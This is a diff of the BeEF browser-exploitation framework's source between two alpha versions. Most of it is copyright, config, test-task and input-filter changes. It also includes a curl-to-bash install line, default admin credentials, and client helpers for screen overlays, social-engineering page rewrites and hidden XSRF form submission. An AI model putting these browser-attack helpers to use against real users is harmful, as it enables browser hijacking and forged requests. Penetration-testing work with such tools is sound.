- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
Quick Start
@@ -60,7 +45,8 @@ Quick Start
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
@@ -72,3 +58,6 @@ To get started, simply execute beef and follow the instructions:
$ ./beef
On windows use
$ ruby beef

36
Rakefile
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -8,14 +8,14 @@ task :default => ["quick"]
desc "Run quick tests"
task :quick do
Rake::Task['unit'].invoke # run unit tests
Rake::Task['unit'].invoke # run unit tests
end
desc "Run all tests"
task :all do
Rake::Task['integration'].invoke # run integration tests
Rake::Task['unit'].invoke # run unit tests
Rake::Task['msf'].invoke # run msf tests
Rake::Task['integration'].invoke # run integration tests
Rake::Task['unit'].invoke # run unit tests
Rake::Task['msf'].invoke # run msf tests
end
desc "Run automated tests (for Jenkins)"
@@ -38,16 +38,16 @@ task :unit => ["install"] do
end
desc "Run MSF unit tests"
task :msf => ["install", "msf_install"] do
task :msf => ["install", "msf_install"] do
Rake::Task['msf_update'].invoke
Rake::Task['msf_start'].invoke
sh "cd test/thirdparty/msf/unit/;ruby -W0 ts_metasploit.rb"
Rake::Task['msf_stop'].invoke
end
task :install do
sh "export BEEF_TEST=true;bundle install"
end
#task :install do
# sh "export BEEF_TEST=true"
#end
################################
# X11 set up
@@ -57,7 +57,7 @@ end
task :xserver_start do
printf "Starting X11 Server (wait 10 seconds)..."
@xserver_process_id = IO.popen("/usr/bin/Xvfb :0 -screen 0 1024x768x24 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
printf '.'
sleep (i) # increase the . display rate
@@ -76,10 +76,10 @@ end
@beef_process_id = nil;
task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..."
printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
delays = [10, 10, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for a few seconds
printf '.'
sleep (i)
end
@@ -99,7 +99,7 @@ end
task :msf_start => '/tmp/msf-test/msfconsole' do
printf "Starting MSF (wait 45 seconds)..."
@msf_process_id = IO.popen("/tmp/msf-test/msfconsole -r test/thirdparty/msf/unit/BeEF.rc 2> /dev/null", "w+")
delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 45 seconds
printf '.'
sleep (i) # increase the . display rate
@@ -116,7 +116,7 @@ task :msf_install => '/tmp/msf-test/msfconsole' do
# Handled by the 'test/msf-test/msfconsole' task.
end
task :msf_update => '/tmp/msf-test/msfconsole' do
task :msf_update => '/tmp/msf-test/msfconsole' do
sh "cd /tmp/msf-test;git pull"
end
@@ -159,10 +159,10 @@ task :cde do
Rake::Task['cde_beef_start'].invoke
Rake::Task['beef_stop'].invoke
puts "\nCleaning Up...\n";
sleep (2);
sleep (2);
sh "rm -rf CDE";
puts "\nCDE Package Created...\n";
end
end
################################
# CDE/BeEF environment set up
@@ -172,7 +172,7 @@ task :cde do
task :cde_beef_start => 'beef' do
printf "Starting CDE BeEF (wait 10 seconds)..."
@beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
printf '.'
sleep (i)

4
VERSION
View File

@@ -1,7 +1,7 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.4.4.3-alpha
0.4.5.0-alpha

3
beef
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env ruby
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"),

87
config.yaml
View File

@@ -1,56 +1,84 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.4.4.3-alpha'
version: '0.4.5.0-alpha'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Interface / IP restrictions
restrictions:
# subnet of browser ip addresses that can hook to the framework
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet: "127.0.0.1/32"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
# It's not advised to decrease it with tons of hooked browsers (more than 50),
# because it might impact performance. Also, enable WebSockets is generally better.
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 5000
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
#public: "" # public hostname/IP address
#public_port: "" # experimental
# DNS
dns_host: "localhost"
dns_port: 53
# Web Admin user interface URI
web_ui_basepath: "/ui"
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
type: "apache" #supported: apache, iis
enable: true
type: "apache" # Supported: apache, iis, nginx
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF)
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
@@ -72,12 +100,14 @@ beef:
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 5432
db_name: "beef"
db_user: "beef"
db_passwd: "beef123"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
user: "beef"
passwd: "beef"
@@ -86,10 +116,16 @@ beef:
# NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
autorun:
enable: true
# set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
# set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
allow_user_notify: true
crypto_default_value_length: 80
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# You may override default extension configuration parameters here
extension:
@@ -108,3 +144,6 @@ beef:
enable: false
ipec:
enable: true
# this is still experimental, we're working on it..
dns:
enable: false

4
core/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -155,7 +155,7 @@ module BeEF
if not result == nil
data << {:api_id => mod[:id], :data => result}
end
rescue Exception => e
rescue => e
print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
end
end

2
core/api/extension.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/extensions.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/configuration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/migration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/network_stack/assethandler.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/server.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/main/server/hook.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/module.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/api/modules.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

3
core/bootstrap.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/api'
## @note Include Websocket

5
core/core.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -37,4 +37,7 @@ require 'core/main/migration'
require 'core/main/console/commandline'
require 'core/main/console/banners'
# @note Include rubyzip lib
require 'zip'

2
core/extension.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/extensions.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters/base.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

32
core/filters/browser.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -12,7 +12,7 @@ module Filters
def self.is_valid_browsername?(str)
return false if not is_non_empty_string?(str)
return false if str.length > 2
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
true
end
@@ -22,7 +22,7 @@ module Filters
def self.is_valid_browsertype?(str)
return false if not is_non_empty_string?(str)
return false if str.length < 10
return false if str.length > 50
return false if str.length > 500 #CxF - had to increase this because the Chrome detection JSON String is getting bigger.
return false if has_non_printable_char?(str)
true
end
@@ -32,7 +32,7 @@ module Filters
# @return [Boolean] If the string has valid Operating System name characters
def self.is_valid_osname?(str)
return false if not is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
return false if str.length < 2
true
end
@@ -52,7 +52,7 @@ module Filters
# @return [Boolean] If the string has valid browser version characters
def self.is_valid_browserversion?(str)
return false if not is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
return true if str.eql? "UNKNOWN"
return false if not nums_only?(str) and not is_valid_float?(str)
return false if str.length > 10
@@ -64,7 +64,7 @@ module Filters
# @return [Boolean] If the string has valid browser / ua string characters
def self.is_valid_browserstring?(str)
return false if not is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
return false if str.length > 300
true
end
@@ -73,7 +73,7 @@ module Filters
# @param [String] str String for testing
# @return [Boolean] If the string has valid cookie characters
def self.is_valid_cookies?(str)
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
return false if str.length > 2000
true
end
@@ -82,7 +82,7 @@ module Filters
# @param [String] str String for testing
# @return [Boolean] If the string has valid screen size characters
def self.is_valid_screen_size?(str)
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
@@ -91,7 +91,7 @@ module Filters
# @param [String] str String for testing
# @return [Boolean] If the string has valid window size characters
def self.is_valid_window_size?(str)
return false if has_non_printable_char?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
@@ -114,6 +114,16 @@ module Filters
true
end
# Verify the CPU type string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid CPU type characters
def self.is_valid_cpu?(str)
return false if not is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the browser_plugins string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser plugin characters
@@ -123,9 +133,9 @@ module Filters
return true if not is_non_empty_string?(str)
return false if str.length > 1000
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end
end

2
core/filters/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/filters/http.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

4
core/filters/page.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -12,7 +12,7 @@ module Filters
def self.is_valid_pagetitle?(str)
return false if not str.is_a? String
return false if has_non_printable_char?(str)
return false if str.length > 50
return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
true
end

2
core/hbmanager.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

6
core/loader.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -15,6 +15,8 @@ require 'ipaddr'
require 'base64'
require 'xmlrpc/client'
require 'openssl'
require 'rubydns'
require 'sourcify'
# @note Include the filters
require 'core/filters'
@@ -29,4 +31,4 @@ require 'core/api'
require 'core/settings'
# @note Include the core of BeEF
require 'core/core'
require 'core/core'

2
core/main/client/are.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

18
core/main/client/beef.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.

1250
core/main/client/browser.js
View File

File diff suppressed because it is too large Load Diff

2
core/main/client/browser/cookie.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/browser/popup.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

181
core/main/client/dom.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -76,36 +76,56 @@ beef.dom = {
return iframe;
},
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
* example usage in the code: beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
* Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
* is assigned to created iframe tag's src attribute resulting in GET request to that URI.
* example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
* @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
* @param: {String} method: can be 'GET' or 'POST'. defaults to GET
* @param: {Hash} params: list of params that will be sent in request.
* @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
* @param: {Function} a callback function to fire once the iFrame has loaded
* @return: {Object} the inserted iFrame
*
*/
createIframe: function(type, method, params, styles, onload) {
createIframe: function(type, params, styles, onload) {
var css = {};
var form_submit = (method.toLowerCase() == 'post') ? true : false;
if (form_submit && params['src'])
{
var form_action = params['src'];
params['src'] = '';
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
if (form_submit && form_action)
{
var id = beef.dom.generateID();
$j(iframe).attr({'id': id, 'name':id});
var form = beef.dom.createForm({'action':form_action, 'method':'get', 'target':id}, false);
$j(form).prependTo('body').submit();
}
return iframe;
},
@@ -127,6 +147,75 @@ beef.dom = {
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -284,7 +373,8 @@ beef.dom = {
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
}else{
}
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
}
if (params != null) {
@@ -292,7 +382,7 @@ beef.dom = {
}
content += "</object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
@@ -311,24 +401,25 @@ beef.dom = {
}
content += "</applet>";
}
if (beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</embed>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
$j('body').append(content);
},
@@ -344,15 +435,17 @@ beef.dom = {
* Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
* @params: {String} action: the form action attribute, where the request will be sent.
* @params: {String} method: HTTP method, usually POST.
* @params: {String} enctype: form encoding type
* @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
* example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
*/
createIframeXsrfForm: function(action, method, inputs){
createIframeXsrfForm: function(action, method, enctype, inputs){
